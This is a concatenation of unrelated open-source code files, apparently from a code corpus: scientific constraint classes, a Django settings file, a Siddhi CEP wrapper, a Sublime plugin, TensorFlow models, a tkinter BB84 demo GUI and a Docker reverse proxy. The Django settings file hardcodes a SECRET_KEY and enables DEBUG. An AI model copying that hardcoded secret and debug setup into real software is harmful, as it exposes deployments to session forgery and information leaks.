'_ExperimentalConstraint__scaleFactor' :'_ExperimentalConstraint__scaleFactor',
'_ExperimentalConstraint__dataWeights' :'_ExperimentalConstraint__dataWeights',
'_ExperimentalConstraint__multiframePrior' :'_ExperimentalConstraint__multiframePrior',
'_ExperimentalConstraint__multiframeWeight' :'_ExperimentalConstraint__multiframeWeight',
'_ExperimentalConstraint__limits' :'_ExperimentalConstraint__limits',
'_ExperimentalConstraint__limitsIndexStart' :'_ExperimentalConstraint__limitsIndexStart',
'_ExperimentalConstraint__limitsIndexEnd' :'_ExperimentalConstraint__limitsIndexEnd',
'_Constraint__used' :'_Constraint__used',
'_Constraint__data' :'_Constraint__data',
'_Constraint__state' :'_Constraint__state',
'_Constraint__standardError' :'_Constraint__standardError',
'_fittedScaleFactor' :'_fittedScaleFactor',
'_usedDataWeights' :'_usedDataWeights',
'_Engine__state' :'_Engine__state',
'_Engine__boxCoordinates' :'_Engine__boxCoordinates',
'_Engine__basisVectors' :'_Engine__basisVectors',
'_Engine__isPBC' :'_Engine__isPBC',
'_Engine__moleculesIndex' :'_Engine__moleculesIndex',
'_Engine__elementsIndex' :'_Engine__elementsIndex',
'_Engine__numberOfAtomsPerElement' :'_Engine__numberOfAtomsPerElement',
'_Engine__elements' :'_Engine__elements',
'_Engine__numberDensity' :'_Engine__numberDensity',
'_Engine__volume' :'_Engine__volume',
'_Engine__realCoordinates' :'_Engine__realCoordinates',
'_atomsCollector' :'_atomsCollector',
('engine','_atomsCollector') :'_atomsCollector',
}
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
class ReducedStructureFactorConstraint(StructureFactorConstraint):
"""
The Reduced Structure Factor that we will also note S(Q)
is exactly the same quantity as the Structure Factor but with
the slight difference that it is normalized to 0 rather than 1
and therefore :math:`<S(Q)>=0`.
The computation of S(Q) is done through a Sine inverse Fourier transform
of the computed pair distribution function noted as G(r).
.. math::
S(Q) = \\frac{1}{Q} \\int_{0}^{\\infty} G(r) sin(Qr) dr
The only reason why the Reduced Structure Factor is implemented, is because
many experimental data are treated in this form. And it is just convenient
not to manipulate the experimental data every time.
"""
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.Gr2SqMatrix, axis=0)
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*Sq
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
""" dummy overload that does exactly the same thing
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData, modelData, dataWeights)
return SF
def plot(self, xlabelParams={'xlabel':'$Q(\\AA^{-1})$', 'size':10},
ylabelParams={'ylabel':'$S(Q)-1$', 'size':10},
**kwargs):
"""
Alias to ExperimentalConstraint.plot with additional parameters
:Additional/Adjusted Parameters:
#. xlabelParams (None, dict): modified matplotlib.axes.Axes.set_xlabel
parameters.
#. ylabelParams (None, dict): modified matplotlib.axes.Axes.set_ylabel
parameters.
"""
return super(StructureFactorConstraint, self).plot(xlabelParams= xlabelParams,
ylabelParams= ylabelParams,
**kwargs)
| agpl-3.0 | 7,406,735,951,820,464,000 | 49.032659 | 178 | 0.575891 | false |
pedroluislopez/candidaturas | candidaturas/settings.py | 1 | 2424 | """
Django settings for candidaturas project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.global_settings import MEDIA_URL
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^-c)soc5oay)1a74+8$xe!jf)3@lro!1^xaxscz$f$peju@xto'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'candidatos',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'candidaturas.urls'
WSGI_APPLICATION = 'candidaturas.wsgi.application'
DATABASE_NAME = ''
DATABASE_USER = ''
DATABASE_PASSWORD = ''
try:
from local_settings import *
except ImportError:
pass
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': DATABASE_NAME,
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'Europe/Madrid'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
| gpl-3.0 | -6,178,601,633,671,091,000 | 23.484848 | 71 | 0.720297 | false |
madhawav/SiddhiCEPPythonAPI | SiddhiCEP3/core/event/ComplexEvent.py | 1 | 3787 | from enum import Enum
from SiddhiCEP3 import SiddhiLoader
from SiddhiCEP3.DataTypes.DataWrapper import unwrapData, wrapData
class ComplexEvent(object):
class Type(Enum):
CURRENT = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().CURRENT(),
EXPIRED = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().EXPIRED(),
TIMER = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().TIMER(),
RESET = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")().RESET()
@classmethod
def _map_value(cls, type_proxy):
type_value = None
if type_proxy.isValueCurrent():
type_value = ComplexEvent.Type.CURRENT
elif type_proxy.isValueExpired():
type_value = ComplexEvent.Type.EXPIRED
elif type_proxy.isValueTimer():
type_value = ComplexEvent.Type.TIMER
elif type_proxy.isValueReset():
type_value = ComplexEvent.Type.RESET
else:
raise TypeError("Unknown Complex Event Type")
return ComplexEvent.Type(type_value)
def __init__(self,):
raise NotImplementedError("Complex Event is Abstract")
def __new__(cls):
bare_instance = object.__new__(cls)
bare_instance._complex_event_proxy = None
return bare_instance
@classmethod
def _fromComplexEventProxy(cls, complex_event_proxy):
'''
Internal Constructor to wrap around JAVA Interface Complex Event
:param complex_event_proxy:
:return:
'''
if complex_event_proxy is None:
return None
instance = cls.__new__(cls)
instance._complex_event_proxy = complex_event_proxy
return instance
def getNext(self):
next_proxy = self._complex_event_proxy.getNext()
return ComplexEvent._fromComplexEventProxy(next_proxy)
def setNext(self, next_event):
self._complex_event_proxy.setNext(next_event._complex_event_proxy)
next = property(getNext, setNext)
def getOutputData(self):
complex_event_static_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
output_data = unwrapData(complex_event_static_proxy.getOutputData(self._complex_event_proxy))
return output_data
def setOutputData(self, datum, index):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
complex_event_static_proxy = SiddhiLoader._loadType(
"org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.ComplexEventProxy")()
complex_event_static_proxy.setOutputData(self._complex_event_proxy,wrapData(datum),index)
def getTimestamp(self):
return self._complex_event_proxy.getTimestamp()
timestamp = property(fget=getTimestamp, fset=None)
def getAttribute(self, position):
return self._complex_event_proxy.getAttribute(position)
def setAttribute(self, value, position):
#TODO: Improve logic here by adding support to long. Will need to make a java wrapping for handling long
self._complex_event_proxy.setAttribute(value,position)
def getType(self):
raw_type_proxy = self._complex_event_proxy.getType()
type_proxy = SiddhiLoader._loadType("org.wso2.siddhi.pythonapi.proxy.core.event.complex_event.TypeProxy")(raw_type_proxy)
return ComplexEvent.Type._map_value(type_proxy)
def setType(self, type):
self._complex_event_proxy.setType(type.value())
type = property(getType, setType)
| apache-2.0 | -1,473,881,451,016,611,300 | 41.550562 | 139 | 0.675469 | false |
DisposaBoy/GoSublime | gsev.py | 1 | 2415 | from .gosubl import gs
from . import gstest
import sublime
import sublime_plugin
import webbrowser
DOMAIN = 'GsEV'
class EV(sublime_plugin.EventListener):
def on_pre_save(self, view):
view.run_command('gs_fmt')
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_post_save(self, view):
sublime.set_timeout(lambda: do_post_save(view), 0)
def on_activated(self, view):
win = view.window()
if win is not None:
active_view = win.active_view()
if active_view is not None:
sublime.set_timeout(lambda: do_sync_active_view(active_view), 0)
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
def on_load(self, view):
sublime.set_timeout(lambda: do_set_gohtml_syntax(view), 0)
class GsOnLeftClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=left"],
"focus_view": False,
"show_view": False,
})
elif view.score_selector(gs.sel(view).begin(), "text.9o") > 0:
view.window().run_command("gs9o_open_selection")
class GsOnRightClick(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
if gs.is_go_source_view(view):
view.run_command('gs9o_open', {
"run": [".actuate", "-button=right"],
"focus_view": False,
"show_view": False,
})
def do_post_save(view):
if not gs.is_pkg_view(view):
return
for c in gs.setting('on_save', []):
cmd = c.get('cmd', '')
args = c.get('args', {})
msg = 'running on_save command %s' % cmd
tid = gs.begin(DOMAIN, msg, set_status=False)
try:
view.run_command(cmd, args)
except Exception as ex:
gs.notice(DOMAIN, 'Error %s' % ex)
finally:
gs.end(tid)
def do_sync_active_view(view):
fn = view.file_name() or ''
gs.set_attr('active_fn', fn)
if fn:
gs.set_attr('last_active_fn', fn)
if fn.lower().endswith('.go'):
gs.set_attr('last_active_go_fn', fn)
win = view.window()
if win is not None and view in win.views():
m = {}
psettings = view.settings().get('GoSublime')
if psettings and gs.is_a(psettings, {}):
m = gs.mirror_settings(psettings)
gs.set_attr('last_active_project_settings', gs.dval(m, {}))
gs.sync_settings()
def do_set_gohtml_syntax(view):
fn = view.file_name()
xl = gs.setting('gohtml_extensions', [])
if xl and fn and fn.lower().endswith(tuple(xl)):
view.set_syntax_file(gs.tm_path('gohtml'))
| mit | -5,356,420,796,553,315,000 | 25.538462 | 68 | 0.657971 | false |
hycis/TensorGraph | examples/mnist_cnn.py | 1 | 6075 | # -*- coding: utf-8 -*-
""" Convolutional Neural Network for MNIST dataset classification task.
References:
Y. LeCun, L. Bottou, Y. Bengio, and P. Haffner. "Gradient-based
learning applied to document recognition." Proceedings of the IEEE,
86(11):2278-2324, November 1998.
Links:
[MNIST Dataset] http://yann.lecun.com/exdb/mnist/
"""
from __future__ import division, print_function, absolute_import
from tensorgraph.layers import Conv2D, RELU, MaxPooling, LRN, Tanh, Dropout, \
Softmax, Flatten, Linear, BatchNormalization
from tensorgraph.utils import same
import tensorgraph as tg
import tensorflow as tf
from tensorgraph.cost import entropy, accuracy
from tensorgraph.dataset import Mnist
from tensorflow.python.framework import ops
def model():
with tf.name_scope('MnistCNN'):
seq = tg.Sequential()
seq.add(Conv2D(num_filters=32, kernel_size=(3, 3), stride=(1, 1), padding='SAME'))
seq.add(BatchNormalization())
seq.add(RELU())
seq.add(MaxPooling(poolsize=(2, 2), stride=(2,2), padding='SAME'))
seq.add(LRN())
seq.add(Conv2D(num_filters=64, kernel_size=(3, 3), stride=(1, 1), padding='SAME'))
seq.add(BatchNormalization())
seq.add(RELU())
seq.add(MaxPooling(poolsize=(2, 2), stride=(2,2), padding='SAME'))
seq.add(LRN())
seq.add(Flatten())
seq.add(Linear(128))
seq.add(BatchNormalization())
seq.add(Tanh())
seq.add(Dropout(0.8))
seq.add(Linear(256))
seq.add(BatchNormalization())
seq.add(Tanh())
seq.add(Dropout(0.8))
seq.add(Linear(10))
seq.add(Softmax())
return seq
def train():
learning_rate = 0.001
batchsize = 32
max_epoch = 300
es = tg.EarlyStopper(max_epoch=max_epoch,
epoch_look_back=3,
percent_decrease=0)
seq = model()
X_train, y_train, X_test, y_test = Mnist(flatten=False, onehot=True, binary=True, datadir='.')
iter_train = tg.SequentialIterator(X_train, y_train, batchsize=batchsize)
iter_test = tg.SequentialIterator(X_test, y_test, batchsize=batchsize)
X_ph = tf.placeholder('float32', [None, 28, 28, 1])
y_ph = tf.placeholder('float32', [None, 10])
y_train_sb = seq.train_fprop(X_ph)
y_test_sb = seq.test_fprop(X_ph)
train_cost_sb = entropy(y_ph, y_train_sb)
test_cost_sb = entropy(y_ph, y_test_sb)
test_accu_sb = accuracy(y_ph, y_test_sb)
# required for BatchNormalization layer
optimizer = tf.train.AdamOptimizer(learning_rate)
update_ops = ops.get_collection(ops.GraphKeys.UPDATE_OPS)
with ops.control_dependencies(update_ops):
train_ops = optimizer.minimize(train_cost_sb)
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.9)
with tf.Session(config = tf.ConfigProto(gpu_options = gpu_options)) as sess:
init = tf.global_variables_initializer()
sess.run(init)
best_valid_accu = 0
for epoch in range(max_epoch):
print('epoch:', epoch)
pbar = tg.ProgressBar(len(iter_train))
ttl_train_cost = 0
ttl_examples = 0
print('..training')
for X_batch, y_batch in iter_train:
feed_dict = {X_ph:X_batch, y_ph:y_batch}
_, train_cost = sess.run([train_ops,train_cost_sb] , feed_dict=feed_dict)
ttl_train_cost += len(X_batch) * train_cost
ttl_examples += len(X_batch)
pbar.update(ttl_examples)
mean_train_cost = ttl_train_cost/float(ttl_examples)
print('\ntrain cost', mean_train_cost)
ttl_valid_cost = 0
ttl_valid_accu = 0
ttl_examples = 0
pbar = tg.ProgressBar(len(iter_test))
print('..validating')
for X_batch, y_batch in iter_test:
feed_dict = {X_ph:X_batch, y_ph:y_batch}
valid_cost, valid_accu = sess.run([test_cost_sb, test_accu_sb] , feed_dict=feed_dict)
ttl_valid_cost += len(X_batch) * valid_cost
ttl_valid_accu += len(X_batch) * valid_accu
ttl_examples += len(X_batch)
pbar.update(ttl_examples)
mean_valid_cost = ttl_valid_cost/float(ttl_examples)
mean_valid_accu = ttl_valid_accu/float(ttl_examples)
print('\nvalid cost', mean_valid_cost)
print('valid accu', mean_valid_accu)
if best_valid_accu < mean_valid_accu:
best_valid_accu = mean_valid_accu
if es.continue_learning(valid_error=mean_valid_cost, epoch=epoch):
print('epoch', epoch)
print('best epoch last update:', es.best_epoch_last_update)
print('best valid last update:', es.best_valid_last_update)
print('best valid accuracy:', best_valid_accu)
else:
print('training done!')
break
def train_with_trainobject():
from tensorgraph.trainobject import train as mytrain
with tf.Session() as sess:
seq = model()
X_train, y_train, X_test, y_test = Mnist(flatten=False, onehot=True, binary=True, datadir='.')
X_ph = tf.placeholder('float32', [None, 28, 28, 1])
y_ph = tf.placeholder('float32', [None, 10])
y_train_sb = seq.train_fprop(X_ph)
y_test_sb = seq.test_fprop(X_ph)
train_cost_sb = entropy(y_ph, y_train_sb)
optimizer = tf.train.AdamOptimizer(0.001)
test_accu_sb = accuracy(y_ph, y_test_sb)
mytrain(session=sess,
feed_dict={X_ph:X_train, y_ph:y_train},
train_cost_sb=train_cost_sb,
valid_cost_sb=-test_accu_sb,
optimizer=optimizer,
epoch_look_back=5, max_epoch=100,
percent_decrease=0, train_valid_ratio=[5,1],
batchsize=64, randomize_split=False)
if __name__ == '__main__':
# train()
train_with_trainobject()
| apache-2.0 | 4,008,166,205,503,598,000 | 37.694268 | 102 | 0.587819 | false |
DQE-Polytech-University/HI | src/console2.py | 1 | 2564 | from tkinter import *
import numpy as np
import math
import Classes as hi
def Insert():
name = text1.get()
Text1.insert(END, name)
text.delete(0,END)
def Key_issue():
bases = text1.get()
long_message = text2.get()
bb84 = hi.Various_measurement(int(bases),int(long_message),0)
bb84.begin()
bb84.compare_bob_alice()
bb84.generate_key()
key = bb84.key
Text1.insert(END, key)
#text.delete(0,END)
root = Tk()
root.title('Encrypt me =P')
root.resizable(False, False)
root.geometry('800x550')
text1 = Entry(root, bg = 'white')
text2 = Entry(root, bg = 'white')
Text1 = Listbox(root,height=15,width=35,bd=0)
Text2 = Listbox(root,height=15,width=35,bd=0)
listbox1=Listbox(root,height=6,width=20,selectmode=EXTENDED)
list1=["Hadamard","NOT","Gate_pi","Gate_pi8","Gate_turn","CNOT"]
for i in list1:
listbox1.insert(END,i)
listbox1.pack()
listbox1.place(x=400, y=35)
post_user = Text(root,height=10,width=32,font='Arial 14',wrap=WORD)
Text1.pack()
Text2.pack()
text1.pack()
text2.pack()
post_user.pack()
text1.place(x=230, y=10)
text2.place(x=230, y=40)
Text1.place(x=400, y= 270)
Text2.place(x=550, y= 270)
post_user.place(x=5, y= 270)
#scrollbar['command'] = Text2.xview
#Text2['yscrollcommand'] = scrollbar.set
def delete():
Text1.delete(0,END)
Text1 = Listbox(Text1)
Text1.pack()
Button1 = Button(root, text="Enter the number of bases:", width=30)
Button2 = Button(root, text="Enter the length of the message:", width=30)
Button3 = Button(root, text="Encrypt message", width=30)
Button4 = Button(root, text="Issue key", width=30, command=Key_issue)
Button5 = Button(root, text="Decrypt message", width=30)
Button6 = Button(root, text="Clear all items", width=30, command=delete)
Button7 = Button(root, text='Exit', width=30, command=root.destroy)
Button9 = Button(root, text="Enter your message:", width=30,bg='green',fg='white')
Button10 = Button(root, text="Our keys:", width=16)
Button11 = Button(root, text="The encrypted message:", width=30)
Button8 = Button(root, text="Select gate:", width=16)
Button1.pack()
Button2.pack()
Button3.pack()
Button4.pack()
Button5.pack()
Button6.pack()
Button7.pack()
Button8.pack()
Button9.pack()
Button10.pack()
Button11.pack()
Button1.place(x=0, y=5)
Button2.place(x=0, y=35)
Button3.place(x=0, y=65)
Button4.place(x=0, y=95)
Button5.place(x=0, y=125)
Button6.place(x=0, y=155)
Button7.place(x=0, y=185)
Button9.place(x=0, y=235)
Button10.place(x=400, y=235)
Button11.place(x=550, y=235)
Button8.place(x=400, y=5)
root.mainloop()
| mit | -945,591,217,603,901,400 | 22.522936 | 82 | 0.688768 | false |
cilium-team/powerstrip | powerstrip/powerstrip.py | 1 | 14164 | from ._config import PluginConfiguration
from ._parser import EndpointParser
from treq.client import HTTPClient
from twisted.internet import reactor, defer
from twisted.internet.interfaces import IHalfCloseableProtocol
from twisted.python import log
from twisted.python.failure import Failure
from twisted.web import server, proxy
from twisted.web.client import Agent
from twisted.web.resource import Resource
from twisted.web.server import NOT_DONE_YET
from urllib import quote as urlquote
from zope.interface import directlyProvides
import StringIO
import json
import treq
import urlparse
class NoPostHooks(Exception):
"""
Do not run any post-hooks, because of an incompatible Docker response type
(streaming/hijacked or chunked).
"""
class DockerProxyClient(proxy.ProxyClient):
"""
An HTTP proxy which knows how to break HTTP just right so that Docker
stream (attach/events) API calls work.
self.http: A boolean which reflects whether the connection is in HTTP mode
(True) or "hijack" mode (False). See
https://docs.docker.com/reference/api/docker_remote_api_v1.14/#32-hijacking
"""
http = True
_streaming = False
_listener = None
_responsePartBuffer = b""
def _fireListener(self, result):
if self._listener is not None:
d = self._listener
self._listener = None
d.callback(result)
def setStreamingMode(self, streamingMode):
"""
Allow anyone with a reference to us to toggle on/off streaming mode.
Useful when we have no post-hooks (and no indication from Docker that
it's sending packets of JSON e.g. with build) and we want to avoid
buffering slow responses in memory.
"""
self._streaming = streamingMode
if streamingMode:
self._fireListener(Failure(NoPostHooks()))
def registerListener(self, d):
"""
Register a one shot listener, which can fire either with:
* Failure(NoPostHooks()) if the proxy is handling comms back to
the client (streaming/chunked modes), or
* A tuple containing the (response, code, content-type).
"""
self._listener = d
def _handleRawStream(self):
"""
Switch the current connection to be a "hijacked" aka raw stream: one
where bytes just get naively proxied back and forth.
"""
def loseWriteConnectionReason(reason):
# discard the reason, for compatibility with readConnectionLost
self.transport.loseWriteConnection()
self.father.transport.readConnectionLost = loseWriteConnectionReason
directlyProvides(self.father.transport, IHalfCloseableProtocol)
self.http = False
self.father.transport.write(
"HTTP/1.1 200 OK\r\n"
"Content-Type: application/vnd.docker.raw-stream\r\n"
"\r\n")
def stdinHandler(data):
self.transport.write(data)
self.father.transport.protocol.dataReceived = stdinHandler
self.setStreamingMode(True)
def handleHeader(self, key, value):
if (key.lower() == "content-type" and
value == "application/vnd.docker.raw-stream"):
self._handleRawStream()
return proxy.ProxyClient.handleHeader(self, key, value)
def handleResponsePart(self, buffer):
"""
If we're not in streaming mode, buffer the response part(s).
"""
if self._streaming:
proxy.ProxyClient.handleResponsePart(self, buffer)
else:
self._responsePartBuffer += buffer
def handleResponseEnd(self):
"""
If we're completing a chunked response, up-call to handle it like a
regular reverse proxy.
If we're completing a non-chunked response, fire the post-hooks.
If we're completing a hijacked response, pass through the connection
close.
"""
if self.http:
if self._streaming:
return proxy.ProxyClient.handleResponseEnd(self)
else:
contentType = self.father.responseHeaders.getRawHeaders("content-type")
if contentType:
contentType = contentType[0]
else:
contentType = None
body = self._responsePartBuffer
self._fireListener(
{"PowerstripProtocolVersion": 1,
"ModifiedServerResponse":
{"Body": body,
"Code": self.father.code,
"ContentType": contentType}})
else:
self.father.transport.loseConnection()
def rawDataReceived(self, data):
if self.http:
return proxy.ProxyClient.rawDataReceived(self, data)
self.father.transport.write(data)
class DockerProxyClientFactory(proxy.ProxyClientFactory):
protocol = DockerProxyClient
_listener = None
def onCreate(self, d):
self._listener = d
def _fireListener(self, result):
if self._listener is not None:
d = self._listener
self._listener = None
d.callback(result)
def buildProtocol(self, addr):
client = proxy.ProxyClientFactory.buildProtocol(self, addr)
self._fireListener(client)
return client
def clientConnectionFailed(self, connector, reason):
connector.connect()
class DockerProxy(proxy.ReverseProxyResource):
proxyClientFactoryClass = DockerProxyClientFactory
def __init__(self, dockerAddr=None, dockerPort=None, dockerSocket=None,
path='', reactor=reactor, config=None):
"""
A docker proxy resource which knows how to connect to real Docker
daemon either via socket (dockerSocket specified) or address + port for
TCP connection (dockerAddr + dockerPort specified).
"""
if config is None:
# Try to get the configuration from the default place on the
# filesystem.
self.config = PluginConfiguration()
else:
self.config = config
self.config.read_and_parse()
self.parser = EndpointParser(self.config)
Resource.__init__(self)
self.host = dockerAddr
self.port = dockerPort
self.socket = dockerSocket
self.path = path
self.reactor = reactor
proxy.ReverseProxyResource.__init__(self, dockerAddr, dockerPort, path, reactor) # NB dockerAddr is not actually used
self.agent = Agent(reactor) # no connectionpool
self.client = HTTPClient(self.agent)
def render(self, request, reactor=reactor):
# We are processing a leaf request.
# Get the original request body from the client.
skipPreHooks = False
if request.requestHeaders.getRawHeaders('content-type') == ["application/json"]:
originalRequestBody = request.content.read()
request.content.seek(0) # hee hee
elif request.requestHeaders.getRawHeaders('content-type') == ["application/tar"]:
# We can't JSON encode binary data, so don't even try.
skipPreHooks = True
originalRequestBody = None
else:
originalRequestBody = None
preHooks = []
postHooks = []
d = defer.succeed(None)
for endpoint in self.parser.match_endpoint(request.method, request.uri.split("?")[0]):
# It's possible for a request to match multiple endpoint
# definitions. Order of matched endpoint is not defined in
# that case.
adapters = self.config.endpoint(endpoint)
preHooks.extend(adapters.pre)
postHooks.extend(adapters.post)
def callPreHook(result, hookURL):
if result is None:
newRequestBody = originalRequestBody
newRequestRequest = request.uri
else:
newRequestBody = result["ModifiedClientRequest"]["Body"]
newRequestRequest = result["ModifiedClientRequest"]["Request"]
return self.client.post(hookURL, json.dumps({
"PowerstripProtocolVersion": 1,
"Type": "pre-hook",
"ClientRequest": {
"Method": request.method,
"Request": newRequestRequest,
"Body": newRequestBody,
}
}), headers={'Content-Type': ['application/json']})
if not skipPreHooks:
for preHook in preHooks:
hookURL = self.config.adapter_uri(preHook)
d.addCallback(callPreHook, hookURL=hookURL)
d.addCallback(treq.json_content)
def doneAllPrehooks(result):
# Finally pass through the request to actual Docker. For now we
# mutate request in-place in such a way that ReverseProxyResource
# understands it.
if result is not None:
requestBody = b""
bodyFromAdapter = result["ModifiedClientRequest"]["Body"]
request.uri = result["ModifiedClientRequest"]["Request"].encode("utf-8")
if bodyFromAdapter is not None:
requestBody = bodyFromAdapter.encode("utf-8")
request.content = StringIO.StringIO(requestBody)
request.requestHeaders.setRawHeaders(b"content-length",
[str(len(requestBody))])
###########################
# The following code is copied from t.w.proxy.ReverseProxy so that
# clientFactory reference can be kept.
if not self.socket:
if self.port == 80:
host = self.host
else:
host = "%s:%d" % (self.host, self.port)
request.requestHeaders.setRawHeaders(b"host", [host])
request.content.seek(0, 0)
rest = request.uri
allRequestHeaders = request.getAllHeaders()
if allRequestHeaders.get("transfer-encoding") == "chunked":
del allRequestHeaders["transfer-encoding"]
# XXX Streaming the contents of the request body into memory could
# cause OOM issues for large build contexts POSTed through
# powerstrip. See https://github.com/ClusterHQ/powerstrip/issues/51
body = request.content.read()
allRequestHeaders["content-length"] = str(len(body))
clientFactory = self.proxyClientFactoryClass(
request.method, rest, request.clientproto,
allRequestHeaders, body, request)
###########################
if self.socket:
self.reactor.connectUNIX(self.socket, clientFactory)
else:
self.reactor.connectTCP(self.host, self.port, clientFactory)
d = defer.Deferred()
clientFactory.onCreate(d)
return d
d.addCallback(doneAllPrehooks)
def inspect(client):
# If there are no post-hooks, allow the response to be streamed
# back to the client, rather than buffered.
d = defer.Deferred()
client.registerListener(d)
if not postHooks:
client.setStreamingMode(True)
return d
d.addCallback(inspect)
def callPostHook(result, hookURL):
serverResponse = result["ModifiedServerResponse"]
return self.client.post(hookURL, json.dumps({
# TODO Write tests for the information provided to the adapter.
"PowerstripProtocolVersion": 1,
"Type": "post-hook",
"ClientRequest": {
"Method": request.method,
"Request": request.uri,
"Body": originalRequestBody,
},
"ServerResponse": {
"ContentType": serverResponse["ContentType"],
"Body": serverResponse["Body"],
"Code": serverResponse["Code"],
},
}), headers={'Content-Type': ['application/json']})
# XXX Need to skip post-hooks for tar archives from e.g. docker export.
# https://github.com/ClusterHQ/powerstrip/issues/52
for postHook in postHooks:
hookURL = self.config.adapter_uri(postHook)
d.addCallback(callPostHook, hookURL=hookURL)
d.addCallback(treq.json_content)
def sendFinalResponseToClient(result):
resultBody = result["ModifiedServerResponse"]["Body"].encode("utf-8")
# Update the Content-Length, since we're modifying the request object in-place.
request.responseHeaders.setRawHeaders(
b"content-length",
[str(len(resultBody))]
)
# Write the final response to the client.
request.write(resultBody)
request.finish()
d.addCallback(sendFinalResponseToClient)
def squashNoPostHooks(failure):
failure.trap(NoPostHooks)
d.addErrback(squashNoPostHooks)
d.addErrback(log.err, 'while running chain')
return NOT_DONE_YET
def getChild(self, path, request):
fragments = request.uri.split("/")
fragments.pop(0)
proxyArgs = (self.host, self.port, self.socket, self.path + '/' + urlquote(path, safe=""),
self.reactor)
#if not request.postpath:
resource = DockerProxy(*proxyArgs, config=self.config)
return resource
class ServerProtocolFactory(server.Site):
def __init__(self, dockerAddr=None, dockerPort=None, dockerSocket=None, config=None):
self.root = DockerProxy(dockerAddr, dockerPort, dockerSocket, config=config)
server.Site.__init__(self, self.root)
| apache-2.0 | 5,407,781,511,916,936,000 | 40.294461 | 125 | 0.592912 | false |
ashtonteng/squad_exp | AttentionLayer.py | 1 | 3451 | import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"]="2"
class AttentionLayer():
"""Implements Context-to-Query Attention. Pays attention to different parts of the query when
reading the passage. Returns, for each word in the passage, a weighted vector of questions."""
def __init__(self, args, p_inputs, q_inputs, scope):
"""p_inputs: batch_size x p_length x hidden_size"""
"""q_inputs: batch_size x q_length x hidden_size"""
print("building attention layer", scope)
batch_size = args.batch_size
vocab_size = args.vocab_size
hidden_size = args.AttentionLayer_size
model = args.model
num_layers = args.num_layers
training = args.training
with tf.name_scope(scope):
p_inputs_shape = tf.shape(p_inputs)
q_inputs_shape = tf.shape(q_inputs)
p_length = p_inputs_shape[1]
q_length = q_inputs_shape[1]
p_inputs_aug = tf.tile(tf.expand_dims(p_inputs, 2), [1, 1, q_length, 1]) #batch_size x p_length x q_length x hidden_size
q_inputs_aug = tf.tile(tf.expand_dims(q_inputs, 1), [1, p_length, 1, 1]) #batch_size x p_length x q_length x hidden_size
pq_elementwise = tf.multiply(p_inputs_aug, q_inputs_aug) #batch_size x p_length x q_length x hidden_size
combo_input = tf.concat([p_inputs_aug, q_inputs_aug, pq_elementwise], axis=3) #batch_size x p_length x q_length x 3*hidden_size
with tf.variable_scope(scope):
w_sim = tf.get_variable("w_sim", [3*hidden_size, 1])
#in order to matmul combo_input with w_sim, we need to first tile w_sim batch_size number of times, and flatten combo_input
